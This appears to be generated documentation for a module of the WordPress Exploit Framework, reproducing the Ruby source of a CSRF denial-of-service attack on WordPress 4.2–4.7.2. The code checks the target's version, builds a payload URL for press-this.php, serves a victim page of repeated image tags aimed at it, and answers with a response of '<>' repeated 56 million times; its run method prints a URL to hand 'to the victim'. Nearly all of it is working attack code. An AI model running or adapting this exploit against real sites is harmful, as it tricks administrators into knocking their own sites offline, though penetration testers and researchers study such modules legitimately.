class Wpxf::Auxiliary::Wp472CsrfDos
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/modules/auxiliary/dos/wp_v4.7.2_csrf_dos.rb, line 6 def initialize super update_info( name: 'WordPress 4.2-4.7.2 - CSRF DoS', desc: %( A Cross-Site Request Forgery (CSRF) vulnerability exists on the Press This page of WordPress. This issue can be used to create a Denial of Service (DoS) condition if an authenticated administrator visits a malicious URL. ), author: [ 'Sipke Mellema', # Vulnerability disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8770'], ['URL', 'https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/'], ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html'] ], date: 'Mar 06 2017' ) register_option( IntegerOption.new( name: 'request_count', required: true, desc: 'The number of requests to make', default: 50 ) ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/wp_v4.7.2_csrf_dos.rb, line 38 def check target_version = wordpress_version return :unknown if target_version.nil? version_vulnerable?(target_version, Gem::Version.new('4.7.3'), Gem::Version.new('4.2')) end
generate_payload_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/wp_v4.7.2_csrf_dos.rb, line 53 def generate_payload_url normalize_uri(wordpress_url_admin, "press-this.php?u=#{url_encode(xss_url)}#{url_encode('.txt')}&url-scan-submit=Scan&#{Utility::Text.rand_alpha(3)}=#{Utility::Text.rand_alpha(3)}") end
on_http_request(path, _params, _headers)
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/wp_v4.7.2_csrf_dos.rb, line 57 def on_http_request(path, _params, _headers) if path == "/#{xss_path}" emit_info 'Starting DoS...' res = '' request_count.times do res = "#{res}<img src='#{generate_payload_url}'>" end { body: res, type: 'text/html' } else emit_info 'Sending DoS payload...' '<>' * 56_000_000 end end
request_count()
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/wp_v4.7.2_csrf_dos.rb, line 49 def request_count normalized_option_value('request_count') end
run()
click to toggle source
Calls superclass method
Wpxf::WordPress::ReflectedXss#run
# File lib/wpxf/modules/auxiliary/dos/wp_v4.7.2_csrf_dos.rb, line 72 def run return false unless super emit_info 'Provide the URL below to the victim to begin the denial of service' puts puts url_with_xss puts start_http_server true end
url_with_xss()
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/wp_v4.7.2_csrf_dos.rb, line 45 def url_with_xss xss_url end